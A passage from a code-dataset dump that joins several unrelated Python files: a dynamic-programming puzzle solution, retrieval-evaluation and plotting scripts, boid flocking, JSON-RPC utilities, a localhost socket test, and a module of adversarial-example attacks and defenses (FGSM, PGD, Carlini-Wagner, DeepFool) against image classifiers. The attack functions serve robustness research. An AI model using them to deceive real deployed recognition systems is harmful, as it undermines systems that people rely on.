3\n# 반복\ndef solution(strs, t):\n answer = 0\n dp = [0] * (len(t)+1)\n strs = set(strs)\n \n for i in range(1,len(t)+1):\n dp[i] = float('inf')\n for j in range(1,min(i+1,6)):\n print(i-j,i,j,min(i+1,6))\n print(t[i-j:i])\n print(dp[i],dp[i-j])\n if t[i-j:i] in strs:\n print('--',min(dp[i],dp[i-j]+1))\n dp[i] = min(dp[i],dp[i-j]+1)\n\n return -1 if dp[-1] == float('inf') else dp[-1]\n","sub_path":"Algorithm/Programmers/level4_dp_단어퍼즐.py","file_name":"level4_dp_단어퍼즐.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594989679","text":"import csv\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom config import Config\nfrom latentSemanticIndexingService import LSI_IRService\nfrom cosSimIRService import CosSim_IRService\nfrom doc2VecIRService import Doc2Vec_IRService\nfrom LdaIRService import LDA_IRService\nfrom Document import Document\nimport random\nfrom neuralEmbIRService import neuralEmb_IRService\nfrom pathlib import Path\nimport numpy as np\nimport os\n\n\n\nclass TestEvaluation:\n def __init__(self, docCSV):\n self.doc = Document()\n self.allHeadlines = self.doc.allTopics\n self.questions = []\n self.expectedPages = []\n self.expectedTopicHeadline = []\n with open(docCSV) as f:\n reader = csv.reader(f)\n # Skip Header\n next(reader)\n questions = []\n for row in reader:\n self.expectedTopicHeadline.append(row[0])\n self.expectedPages.append(list(map(int, row[1].split(\",\"))))\n questions.append(list(map(str.strip, row[2:])))\n self.questions = questions\n\n def startTopNRandom(self, n):\n total = 0\n correct = 0\n for i in range(len(self.expectedTopicHeadline)):\n for question in self.questions[i]:\n if question.strip():\n topNHeadlines = []\n answers = []\n for j in range(n):\n answers.append(random.choice(self.doc.allTopics))\n for answer in answers:\n topNHeadlines.append(answer)\n if self.expectedTopicHeadline[i].strip() in topNHeadlines:\n correct += 1\n total += 1\n print(\"Top {} Evaluation finished! \".format(n) + str(correct) + \"/\" + str(total) + \"=\" + str(\n correct * 100 / total) + \"% correct.\")\n return correct * 100 / total\n\n def startTopNEvaluation(self, retrievalMethod, n):\n total = 0\n correct = 0\n correctAnsweredQuestions = []\n for i in range(len(self.expectedTopicHeadline)):\n for question in self.questions[i]:\n if question.strip():\n topNHeadlines = []\n answers = retrievalMethod.getTopNAnswers(question, n)\n for answer in answers:\n topNHeadlines.append(answer.topicHeadline.strip())\n # print(\"question:\", question)\n # print(\"expect:\", self.expectedTopicHeadline[i])\n # print(\"list:\", topNHeadlines)\n if self.expectedTopicHeadline[i].strip() in topNHeadlines:\n correct += 1\n correctAnsweredQuestions.append(1)\n else:\n correctAnsweredQuestions.append(0)\n total += 1\n print(\"Top {} Evaluation finished! \".format(n) + str(correct) + \"/\" + str(total) + \"=\" + str(\n correct * 100 / total) + \"% correct.\")\n plt.bar(range(0, len(correctAnsweredQuestions), 1), correctAnsweredQuestions)\n plt.xlabel('Question')\n plt.ylabel('Correctness')\n plt.title('Distribution of correct answers for mixed neuralEmb')\n plt.grid()\n plt.show()\n return correct * 100 / total\n\n\ndef plotLSI():\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n kList = []\n resTop1 = []\n resTop3 = []\n resTop10 = []\n\n for k in range(10, 220, 20):\n print(\"K:\", k)\n kList.append(k)\n service = LSI_IRService(config.manualPath, k)\n resTop1.append(tester.startTopNEvaluation(service, 1))\n resTop3.append(tester.startTopNEvaluation(service, 3))\n resTop10.append(tester.startTopNEvaluation(service, 10))\n fig, ax = plt.subplots()\n res1 = np.array(resTop1)\n res3 = np.array(resTop3)\n res10 = np.array(resTop10)\n print(\"max 1\", np.amax(res1))\n print(\"max 3\", np.amax(res3))\n print(\"max 10\",np.amax(res10))\n ax.plot(kList, resTop1, linestyle='--', marker=\"^\")\n ax.plot(kList, resTop3, linestyle='--', marker=\"+\")\n ax.plot(kList, resTop10, linestyle='--', marker=\"o\")\n\n ax.set(xlabel='k', ylabel='P@1[%] P@10[%]',\n title='Precision at 1, 3 and 10 for different k values')\n ax.grid()\n plt.xticks(range(0, 220, 20))\n fig.savefig(\"LSIrampe0-200.png\")\n plt.show()\n\n\ndef plotLDAKTopics():\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n kList = []\n resTop10 = []\n resTop3 = []\n resTop1 = []\n\n for k in range(5, 205, 5):\n if Path(config.ldaModelFile).exists():\n os.remove(config.ldaModelFile)\n print(\"K:\", k)\n kList.append(k)\n service = LDA_IRService(k)\n resTop1.append(tester.startTopNEvaluation(service, 1))\n resTop3.append(tester.startTopNEvaluation(service, 3))\n resTop10.append(tester.startTopNEvaluation(service, 10))\n fig, ax = plt.subplots()\n ax.plot(kList, resTop1, linestyle='--', marker=\"^\")\n ax.plot(kList, resTop3, linestyle='-.', marker=\"+\")\n ax.plot(kList, resTop10, linestyle='--', marker=\"o\")\n ax.set(xlabel='k number of topics', ylabel='P@1[%] P@3[%] P@10[%]',\n title='Precision at 1, 3 and 10 for k topics')\n ax.grid()\n plt.xticks(range(0, 220, 20))\n\n fig.savefig(\"LDA5-200Ktopics.png\")\n plt.show()\n\ndef plotLDA():\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n kList = []\n resTop10 = []\n resTop3 = []\n resTop1 = []\n\n for k in range(1, 21, 1):\n if Path(config.ldaModelFile).exists():\n os.remove(config.ldaModelFile)\n print(\"K:\", k)\n kList.append(k)\n service = LDA_IRService()\n resTop1.append(tester.startTopNEvaluation(service, 1))\n resTop3.append(tester.startTopNEvaluation(service, 3))\n resTop10.append(tester.startTopNEvaluation(service, 10))\n fig, ax = plt.subplots()\n ax.plot(kList, resTop1, linestyle='--', marker=\"^\")\n ax.plot(kList, resTop3, linestyle='-.', marker=\"+\")\n ax.plot(kList, resTop10, linestyle='--', marker=\"o\")\n ax.set(xlabel='Iteration', ylabel='P@1[%] P@3[%] P@10[%]',\n title='Precision at 1, 3 and 10 for 32 topics')\n ax.grid()\n plt.xticks(range(1, 22, 2))\n\n fig.savefig(\"LDA20mal-32topics-justHeadline.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n print(\"LDA Results:\")\n ldaService = LDA_IRService()\n ldaTop1 = tester.startTopNEvaluation(ldaService, 1)\n ldaTop3 = tester.startTopNEvaluation(ldaService, 3)\n ldaTop10 = tester.startTopNEvaluation(ldaService, 10)\n # print(\"CosSim Results:\")\n # cosSimService = CosSim_IRService(config.manualPath)\n # cossimTop1 = tester.startTopNEvaluation(cosSimService, 1)\n # cossimTop3 = tester.startTopNEvaluation(cosSimService, 3)\n # cossimTop10 = tester.startTopNEvaluation(cosSimService, 10)\n # lsiService = LSI_IRService(config.manualPath, 60)\n # print(\"LSI Results:\")\n # lsitop1 = tester.startTopNEvaluation(lsiService, 1)\n # lsitop3 = tester.startTopNEvaluation(lsiService, 3)\n # lsitop10 = tester.startTopNEvaluation(lsiService, 10)\n # print(\"Neural Embedding Results:\")\n # nEmbService = neuralEmb_IRService()\n # tester.startTopNEvaluation(nEmbService, 1)\n # tester.startTopNEvaluation(nEmbService, 3)\n # tester.startTopNEvaluation(nEmbService, 10)\n # print(\"Random Results:\")\n # tester.startTopNRandom(1)\n # tester.startTopNRandom(3)\n # tester.startTopNRandom(10)\n # plotLDAKTopics()\n # plotLDA()\n # plotLSI()\n","sub_path":"thesis/src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"457157606","text":"import numpy as np\n\nCANVAS_RES = (800, 600)\nPERCEPTION_RADIUS = 100\nMAX_SPEED = 4\nMAX_FORCE = 0.1\n\n\ndef edge(current):\n current.pos[0] %= CANVAS_RES[0]\n current.pos[1] %= CANVAS_RES[1]\n\n\ndef native_array(array):\n np_array = np.array(array)\n return [np_array[0].item(), np_array[1].item()]\n\n\ndef max_force(vec):\n if np.linalg.norm(vec) > MAX_FORCE:\n return (vec / np.linalg.norm(vec)) * MAX_FORCE\n return vec\n\n\ndef max_speed(vec):\n if np.linalg.norm(vec) > 0:\n return (vec / np.linalg.norm(vec)) * MAX_SPEED\n\n\ndef flock_vectors(current, boids):\n alignment = np.array([0, 0])\n cohesion = np.array([0, 0])\n separation = np.array([0, 0])\n total = 0\n for other in boids:\n diff = np.array(other.pos) - np.array(current.pos)\n dist = np.linalg.norm(diff)\n if other is not current and dist < PERCEPTION_RADIUS:\n alignment = np.add(alignment, np.array(other.vel))\n\n cohesion = np.add(cohesion, np.array(other.pos))\n\n diff_vec = np.subtract(np.array(current.pos), np.array(other.pos))\n diff_vec = np.divide(diff_vec, dist) if dist != 0 else diff_vec\n separation = np.add(separation, np.array(diff_vec))\n\n total += 1\n if total > 0:\n alignment = np.divide(alignment, total)\n alignment = (alignment / np.linalg.norm(alignment)) * MAX_SPEED\n alignment = np.subtract(alignment, np.array(current.vel))\n\n cohesion = np.divide(cohesion, total)\n cohesion = np.subtract(cohesion, np.array(current.pos))\n cohesion = max_speed(cohesion)\n cohesion = np.subtract(cohesion, np.array(current.vel))\n cohesion = max_force(cohesion)\n\n separation = np.divide(separation, total)\n separation = max_speed(separation)\n separation = np.subtract(separation, np.array(current.vel))\n separation = max_force(separation)\n\n return alignment, cohesion, separation\n\n\ndef attack(rock_position, rock_velocity, rock_acceleration, current, ship, missiles):\n missiles_list = list(missiles)\n attack_direction = np.subtract(ship.pos, current.pos)\n if len(missiles_list) > 0:\n attack_direction = np.subtract(missiles_list[0].pos, current.pos)\n\n attack_direction = max_speed(attack_direction)\n attack_direction = np.subtract(attack_direction, np.array(current.vel))\n attack_direction = max_force(attack_direction)\n\n attack_direction = native_array(attack_direction)\n if attack_direction != [0, 0]:\n rock_acceleration = native_array(attack_direction)\n\n rock_position = np.add(rock_position, rock_velocity)\n rock_velocity = np.add(rock_velocity, rock_acceleration)\n\n return rock_position, rock_velocity\n\n\ndef defense(rock_position, rock_velocity, rock_acceleration, current, ship, missiles):\n missiles_list = list(missiles)\n defense_direction = np.subtract(current.pos, ship.pos)\n if len(missiles_list) > 0:\n defense_direction = np.subtract(current.pos, missiles_list[0].pos)\n\n defense_direction = max_speed(defense_direction)\n defense_direction = np.subtract(defense_direction, np.array(current.vel))\n defense_direction = max_force(defense_direction)\n\n defense_direction = native_array(defense_direction)\n if defense_direction != [0, 0]:\n rock_acceleration = native_array(defense_direction)\n\n rock_position = np.add(rock_position, rock_velocity)\n rock_velocity = np.add(rock_velocity, rock_acceleration)\n\n return rock_position, rock_velocity\n\n\ndef update_rock_position(current, boids, ship, missiles):\n acceleration = [0, 0]\n alignment, cohesion, separation = flock_vectors(current, boids)\n\n total = np.add(acceleration, alignment)\n total = np.add(total, cohesion)\n total = np.add(total, separation)\n total = native_array(total)\n if total != [0, 0]:\n acceleration = native_array(total)\n\n position = np.array(current.pos)\n velocity = np.array(current.vel)\n acceleration = np.array(acceleration)\n\n position = np.add(position, velocity)\n velocity = np.add(velocity, acceleration)\n\n # by default CALM behaviour is used\n no_missiles = len(missiles)\n # if there are less than 3 missiles the attack behaviour is used\n if 0 < no_missiles <= 3:\n position, velocity = attack(position, velocity, acceleration, current, ship, missiles)\n # if there are mote than 3 missiles then defense behaviour is used\n elif no_missiles > 3:\n position, velocity = defense(position, velocity, acceleration, current, ship, missiles)\n\n current.pos = native_array(position)\n current.vel = native_array(velocity)\n\n edge(current)\n","sub_path":"Lab2/FlockingAsteroids/rock_behaviour.py","file_name":"rock_behaviour.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"490408753","text":"# -*- coding: utf-8 -*-\nimport asyncio\nimport functools\nimport logging\nfrom collections import OrderedDict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom copy import deepcopy\nfrom typing import Callable\nfrom typing import Optional\nfrom typing import Tuple\n\nfrom funcy.decorators import Call\nfrom funcy.decorators import decorator\n\nfrom jussi.typedefs import HTTPRequest\nfrom jussi.typedefs import HTTPResponse\nfrom jussi.typedefs import JsonRpcRequest\nfrom jussi.typedefs import SingleJsonRpcRequest\nfrom jussi.typedefs import SingleJsonRpcResponse\nfrom jussi.typedefs import StringTrie\nfrom jussi.typedefs import WebApp\n\nlogger = logging.getLogger('sanic')\n\nJSONRPC_REQUEST_KEYS = set(['id','jsonrpc','method','params'])\n\n# decorators\n@decorator\ndef apply_single_or_batch(call: Call) -> JsonRpcRequest:\n \"\"\"Decorate func to apply func to single or batch jsonrpc_requests\n \"\"\"\n if isinstance(call.single_jsonrpc_request, list):\n original = deepcopy(call.single_jsonrpc_request)\n results = []\n for request in original:\n # pylint: disable=protected-access\n call._kwargs['single_jsonrpc_request'] = request\n results.append(call())\n return results\n return call()\n\n\n@decorator\nasync def ignore_errors_async(call: Call) -> Optional[dict]:\n try:\n # pylint: disable=protected-access\n if not asyncio.iscoroutinefunction(call._func):\n loop = asyncio.get_event_loop()\n executor = ThreadPoolExecutor(max_workers=1)\n return await loop.run_in_executor(executor, call)\n return await call()\n except Exception as e:\n logger.exception('Error ignored %s', e)\n\n\ndef async_exclude_methods(middleware_func: Optional[Callable]=None,\n exclude_http_methods: Tuple[str]=None) -> Optional[Callable]:\n \"\"\"Exclude specified HTTP methods from middleware\n\n Args:\n middleware_func:\n exclude_http_methods:\n\n Returns:\n\n \"\"\"\n if middleware_func is None:\n return functools.partial(\n async_exclude_methods, exclude_http_methods=exclude_http_methods)\n\n @functools.wraps(middleware_func)\n async def f(request: HTTPRequest) -> Optional[HTTPResponse]:\n if request.method in exclude_http_methods:\n return\n return await middleware_func(request)\n return f\n\n\n@apply_single_or_batch\ndef sort_request(\n single_jsonrpc_request: SingleJsonRpcRequest=None) -> OrderedDict:\n params = single_jsonrpc_request.get('params')\n if isinstance(params, dict):\n single_jsonrpc_request['params'] = dict(\n sorted(single_jsonrpc_request['params'].items()))\n return OrderedDict(sorted(single_jsonrpc_request.items()))\n\n\n@apply_single_or_batch\ndef is_valid_jsonrpc_request(\n single_jsonrpc_request: SingleJsonRpcRequest=None) -> None:\n if not isinstance(single_jsonrpc_request, dict):\n raise ValueError('Not JSONRPC Request')\n assert JSONRPC_REQUEST_KEYS.issuperset(single_jsonrpc_request.keys())\n assert single_jsonrpc_request.get('jsonrpc') == '2.0'\n assert isinstance(single_jsonrpc_request.get('method'), str)\n if 'id' in single_jsonrpc_request:\n assert isinstance(single_jsonrpc_request['id'], (int, str, type(None)))\n\n\n\ndef parse_namespaced_method(namespaced_method: str,\n default_namespace: str='steemd'\n ) -> Tuple[str, str]:\n parts = namespaced_method.split('.')\n if len(parts) == 1:\n return default_namespace, namespaced_method\n return parts[0], '.'.join(parts[1:])\n\n\ndef method_urn(single_jsonrpc_request: SingleJsonRpcRequest) -> str:\n api = None\n query = ''\n namespace, method = parse_namespaced_method(\n single_jsonrpc_request['method'])\n params = single_jsonrpc_request.get('params', None)\n if isinstance(params, dict):\n params = dict(sorted(params.items()))\n if namespace == 'steemd':\n if method == 'call':\n assert isinstance(params, list)\n api = params[0]\n method = params[1]\n params = params[2]\n else:\n api = 'database_api'\n if params and params != []:\n query = ('.params=%s' % params).replace(' ', '')\n return '.'.join([p for p in (namespace, api, method, ) if p]) + query\n\n\ndef get_upstream(upstreams, single_jsonrpc_request: SingleJsonRpcRequest\n ) -> Tuple[str, int]:\n urn = method_urn(single_jsonrpc_request)\n _, ttl = upstreams.longest_prefix(urn)\n return 'error', ttl\n\n\ndef is_batch_jsonrpc(\n jsonrpc_request: JsonRpcRequest=None,\n sanic_http_request: HTTPRequest=None, ) -> bool:\n return isinstance(jsonrpc_request, list) or isinstance(\n sanic_http_request.json, list)\n\ndef is_jsonrpc_error_response(jsonrpc_response: SingleJsonRpcResponse) -> bool:\n if not jsonrpc_response:\n return True\n if not isinstance(jsonrpc_response, dict):\n return True\n if 'error' in jsonrpc_response:\n return True\n return False\n\n\ndef upstream_url_from_jsonrpc_request(\n upstream_urls: StringTrie=None,\n single_jsonrpc_request: SingleJsonRpcRequest=None) -> str:\n urn = method_urn(single_jsonrpc_request=single_jsonrpc_request)\n return upstream_url_from_urn(upstream_urls, urn=urn)\n\n\ndef upstream_url_from_urn(upstream_urls: StringTrie=None,\n urn: str=None) -> str:\n _, url = upstream_urls.longest_prefix(urn)\n return url\n\n\n# pylint: disable=super-init-not-called\nclass AttrDict(dict):\n def __init__(self, *args, **kwargs) -> None:\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self\n\n\nclass DummyRequest(AttrDict):\n def __init__(self, app: WebApp=None, json: dict=None) -> None:\n self.app = app\n self.json = json\n","sub_path":"jussi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273557832","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport unittest\nimport os\nimport sys\nimport inspect\nimport threading\nimport socket\nimport json\n\nfrom basetest import BaseTest, FILEZONE, DOMAIN\n\nfrom libs.utils import get_logger, ip_generator, id_generator, \\\n silentremove\nfrom libs.ipanel_socket_server import IpanelTCPServer, \\\n IpanelTCPServerHandler\n\nHOST = '127.0.0.1'\nPORT = 13373\nDOMAIN = 'example.com'\nFILEZONE = '/tmp/' + DOMAIN + '.zone'\nHOST1 = '.'.join([id_generator(), DOMAIN, ''])\nHOST2 = '.'.join([id_generator(), DOMAIN, ''])\nIP1 = ip_generator()\nIP2 = ip_generator()\n\n\nclass MyRequestHandlerTest(unittest.TestCase):\n\n def setUp(self):\n self.server = IpanelTCPServer((HOST, PORT),\n IpanelTCPServerHandler)\n self.server_thread = \\\n threading.Thread(target=self.server.serve_forever)\n self.client = socket.create_connection((HOST, PORT))\n\n # self.server_thread.setDaemon(True)\n\n self.server_thread.start()\n\n def tearDown(self):\n self.client.close()\n self.server.shutdown()\n self.server.server_close()\n silentremove(FILEZONE)\n\n def send_data(self, data):\n self.client.send(json.dumps(data))\n\n def recv_data(self):\n return json.loads(self.client.recv(10240))\n\n def test_create_rr_a(self):\n data = {\n 'command': 'manage_dns',\n 'action': 'add',\n 'domain': DOMAIN,\n 'type': 'a',\n 'host': HOST1,\n 'dest': IP1,\n 'filename': FILEZONE,\n }\n self.send_data(data)\n result = self.recv_data()\n self.assertEqual(result['success'], True)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537853809","text":"from __future__ import print_function\nimport torch\nimport sys\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nsys.path.append('..')\nfrom utils import *\n\n# epsilons = [0, .05, .1, .15, .2, .25, .3]\n# use_cuda=True\n\n# you need to set requires_grad attribute of tensor before calling this function.\n# data.requires_grad = True\n# you can call this function as #perturbed_data = fgsm_attack(data, epsilon, data_grad)\n# FGSM attack code\ndef cw_l2_defense(model, model_low, model_high, images, labels, targeted=False, c=1e-4, kappa=50, max_iter=40, learning_rate=0.01, device='cuda'):\n\n # Define f-function\n def f(x):\n # outputs = model(x)\n low_layer = model_low(images)\n high_layer = model_high(images)\n\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n\n inputs_joint = concat_tensor_and_vector(low_layer, high_layer, device)\n outputs = model(inputs_joint)\n\n return outputs\n\n # one_hot_labels = torch.eye(len(outputs[0]))[labels].to(device)\n #\n # i, _ = torch.max((1-one_hot_labels)*outputs, dim=1)\n # j = torch.masked_select(outputs, one_hot_labels.bool())\n #\n # # If targeted, optimize for making the other class most likely\n # if targeted:\n # return torch.clamp(i-j, min=-kappa)\n #\n # # If untargeted, optimize for making the other class most likely\n # else:\n # return torch.clamp(j-i, min=-kappa)\n\n w = torch.zeros_like(images, requires_grad=True).to(device)\n w.detach_()\n w.requires_grad = True\n\n optimizer = optim.Adam([w], lr=learning_rate)\n prev = 1e10\n\n for step in range(max_iter):\n\n a = 1/2*(nn.Tanh()(w) + 1)\n\n loss1 = nn.MSELoss(reduction='sum')(a, images)\n loss2 = torch.sum(c*f(a))\n\n cost = loss1 + loss2\n\n optimizer.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Early Stop when loss does not converge.\n if step % (max_iter//10) == 0:\n if cost > prev:\n print('Attack Stopped due to CONVERGENCE....')\n return (1/2*(nn.Tanh()(w) + 1)).detach()\n prev = cost\n\n # print('- Learning Progress : %2.2f %% ' %((step+1)/max_iter*100), end='\\r')\n\n attack_images = 1/2*(nn.Tanh()(w) + 1).detach()\n\n return attack_images\n\ndef pgd_defense(model, model_low, model_high, images, labels, targeted=False, eps=8/255, alpha=2/255, iters=20, random_start=True, device='cuda', detector_on=True):\n\n loss = nn.BCELoss()\n if targeted:\n loss = lambda x, y: -nn.BCELoss()(x, y)\n\n ori_images = images.clone().detach()\n\n if random_start:\n # Starting at a uniformly random point\n images = images + torch.empty_like(images).uniform_(-eps, eps)\n images = torch.clamp(images, min=0, max=1)\n\n for i in range(iters):\n images.requires_grad = True\n\n low_layer = model_low(images)\n high_layer = model_high(images)\n\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n\n inputs_joint = concat_tensor_and_vector(low_layer, high_layer, device)\n outputs = model(inputs_joint)\n\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images,\n retain_graph=False, create_graph=False)[0]\n if detector_on: # and (i == 0):\n grad = grad * torch.where(outputs > 0.5, torch.tensor([1.]).to(device), torch.tensor([0.]).to(device)).reshape((-1, 1, 1, 1))\n\n adv_images = images - alpha * grad.sign()\n eta = torch.clamp(adv_images - ori_images, min=-eps, max=eps)\n images = torch.clamp(ori_images + eta, min=0, max=1).detach()\n\n adv_images = images\n\n return adv_images\n\ndef fgsm_attack_rev(model, images, labels, eps=8/255):\n loss = nn.CrossEntropyLoss()\n\n images.requires_grad = True\n\n outputs = model(images)\n\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images, retain_graph=False, create_graph=False)[0]\n\n adv_images = images + eps * grad.sign()\n adv_images = torch.clamp(adv_images, min=0, max=1).detach()\n\n return adv_images\n\n\n\n# you can call this function as\n# perturbed_data = basic_iterative_attack(model, loss, data, target, scale=1, eps=4, alpha=epsilon)\n#BIM attack code\ndef basic_iterative_attack(model, images, labels, eps=8/255, alpha=2/255, iters=0):\n\n if iters == 0 :\n # The paper said min(eps + 4, 1.25*eps) is used as iterations\n iters = int(min(eps * 255 + 4, 1.25 * eps * 255))\n\n loss = nn.CrossEntropyLoss()\n\n for i in range(iters):\n images.requires_grad = True\n outputs = model(images)\n\n # model.zero_grad()\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images,\n retain_graph=False, create_graph=False)[0]\n # cost.backward()\n\n adv_images = images + alpha * grad.sign()\n\n # Clip attack images(X')\n # min{255, X+eps, max{0, X-eps, X'}}\n # = min{255, min{X+eps, max{max{0, X-eps}, X'}}}\n\n # a = max{0, X-eps}\n a = torch.clamp(images - eps, min=0)\n # b = max{a, X'}\n b = (adv_images>=a).float()*adv_images + (a>adv_images).float()*a\n # c = min{X+eps, b}\n c = (b > images+eps).float()*(images+eps) + (images+eps >= b).float()*b\n # d = min{255, c}\n images = torch.clamp(c, max=1).detach_()\n\n return images\n\n\ndef cw_linf_attack(model, images, labels, targeted=False, c=1e-2, kappa=0, max_iter=20, learning_rate=0.01, device='cuda'):\n\n # Define f-function\n def f(x):\n outputs = model(x)\n one_hot_labels = torch.eye(len(outputs[0]))[labels].to(device)\n\n i, _ = torch.max((1-one_hot_labels)*outputs, dim=1)\n j = torch.masked_select(outputs, one_hot_labels.bool())\n\n # If targeted, optimize for making the other class most likely\n if targeted:\n return torch.clamp(i-j, min=-kappa)\n\n # If untargeted, optimize for making the other class most likely\n else:\n return torch.clamp(j-i, min=-kappa)\n\n w = torch.zeros_like(images, requires_grad=True).to(device)\n w.detach_()\n w.requires_grad = True\n\n optimizer = optim.Adam([w], lr=learning_rate)\n prev = 1e10\n\n for step in range(max_iter):\n loss1 = torch.sum(c*f(images + w))\n loss2 = torch.sum(torch.relu(w-0.031))\n\n # a = 1/2*(nn.Tanh()(w) + 1)\n #\n # loss1 = nn.MSELoss(reduction='sum')(a, images)\n # loss2 = torch.sum(c*f(a))\n #\n cost = loss1 + loss2\n\n optimizer.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Early Stop when loss does not converge.\n if step % (max_iter//10) == 0:\n if cost > prev:\n # print('Attack Stopped due to CONVERGENCE....')\n return images + torch.clamp(w, max=0.031)\n prev = cost\n\n # print('- Learning Progress : %2.2f %% ' %((step+1)/max_iter*100), end='\\r')\n\n attack_images = images + torch.clamp(w, max=0.031)\n\n return attack_images\n\n\n# CW-L2 Attack\n# you can call this function as\n# perturbated_images = cw_l2_attack(model, images, labels, targeted=False, c=0.1)\n# Based on the paper, i.e. not exact same version of the code on https://github.com/carlini/nn_robust_attacks\n# (1) Binary search method for c, (2) Optimization on tanh space, (3) Choosing method best l2 adversaries is NOT IN THIS CODE.\ndef cw_l2_attack(model, images, labels, targeted=False, c=1e-2, kappa=0, max_iter=30, learning_rate=0.01, device='cuda'):\n\n # Define f-function\n def f(x):\n outputs = model(x)\n one_hot_labels = torch.eye(len(outputs[0]))[labels].to(device)\n\n i, _ = torch.max((1-one_hot_labels)*outputs, dim=1)\n j = torch.masked_select(outputs, one_hot_labels.bool())\n\n # If targeted, optimize for making the other class most likely\n if targeted:\n return torch.clamp(i-j, min=-kappa)\n\n # If untargeted, optimize for making the other class most likely\n else:\n return torch.clamp(j-i, min=-kappa)\n\n w = torch.zeros_like(images, requires_grad=True).to(device)\n w.detach_()\n w.requires_grad = True\n\n optimizer = optim.Adam([w], lr=learning_rate)\n prev = 1e10\n\n for step in range(max_iter):\n\n a = 1/2*(nn.Tanh()(w) + 1)\n\n loss1 = nn.MSELoss(reduction='sum')(a, images)\n loss2 = torch.sum(c*f(a))\n\n cost = loss1 + loss2\n\n optimizer.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Early Stop when loss does not converge.\n if step % (max_iter//10) == 0:\n if cost > prev:\n print('Attack Stopped due to CONVERGENCE....')\n return (1/2*(nn.Tanh()(w) + 1)).detach()\n prev = cost\n\n # print('- Learning Progress : %2.2f %% ' %((step+1)/max_iter*100), end='\\r')\n\n attack_images = 1/2*(nn.Tanh()(w) + 1).detach()\n\n return attack_images\n\ndef pgd_attack(model, images, labels, targeted=False, eps=8/255, alpha=1/255, iters=20, random_start=True):\n\n loss = nn.CrossEntropyLoss()\n if targeted:\n loss = lambda x, y: -nn.CrossEntropyLoss()(x, y)\n\n ori_images = images.clone().detach()\n\n if random_start:\n # Starting at a uniformly random point\n images = images + torch.empty_like(images).uniform_(-eps, eps)\n images = torch.clamp(images, min=0, max=1)\n\n for i in range(iters):\n images.requires_grad = True\n outputs = model(images)\n\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images,\n retain_graph=False, create_graph=False)[0]\n\n adv_images = images + alpha * grad.sign()\n eta = torch.clamp(adv_images - ori_images, min=-eps, max=eps)\n images = torch.clamp(ori_images + eta, min=0, max=1).detach()\n\n adv_images = images\n\n return adv_images\n\ndef deepfool(model, images, labels, steps=20):\n\n for b in range(images.shape[0]):\n\n image = images[b:b + 1, :, :, :]\n\n image.requires_grad = True\n output = model(image)[0]\n\n _, pre_0 = torch.max(output, 0)\n f_0 = output[pre_0]\n grad_f_0 = torch.autograd.grad(f_0, image,\n retain_graph=False,\n create_graph=False)[0]\n num_classes = len(output)\n\n for i in range(steps):\n image.requires_grad = True\n output = model(image)[0]\n _, pre = torch.max(output, 0)\n\n if pre != pre_0:\n image = torch.clamp(image, min=0, max=1).detach()\n break\n\n r = None\n min_value = None\n\n for k in range(num_classes):\n if k == pre_0:\n continue\n\n f_k = output[k]\n grad_f_k = torch.autograd.grad(f_k, image,\n retain_graph=True,\n create_graph=True)[0]\n\n f_prime = f_k - f_0\n grad_f_prime = grad_f_k - grad_f_0\n value = torch.abs(f_prime) / torch.norm(grad_f_prime)\n\n if r is None:\n r = (torch.abs(f_prime) / (torch.norm(grad_f_prime) ** 2)) * grad_f_prime\n min_value = value\n else:\n if min_value > value:\n r = (torch.abs(f_prime) / (torch.norm(grad_f_prime) ** 2)) * grad_f_prime\n min_value = value\n\n image = torch.clamp(image + r, min=0, max=1).detach()\n\n images[b:b + 1, :, :, :] = image\n\n adv_images = images\n\n return adv_images\n\ndef test( model, device, test_loader, epsilon, attack_method ):\n\n # Accuracy counter\n correct = 0\n adv_examples = []\n\n # Loop over all examples in test set\n for data, target in test_loader:\n\n # Send the data and label to the device\n data, target = data.to(device), target.to(device)\n\n # Set requires_grad attribute of tensor. Important for Attack\n data.requires_grad = True\n\n # Forward pass the data through the model\n output = model(data)\n init_pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n print(init_pred)\n print(target)\n\n # If the initial prediction is wrong, dont bother attacking, just move on\n if init_pred.item() != target.item():\n continue\n # Calculate the loss\n loss = F.nll_loss(output, target)\n\n # Zero all existing gradients\n model.zero_grad()\n\n # Calculate gradients of model in backward pass\n 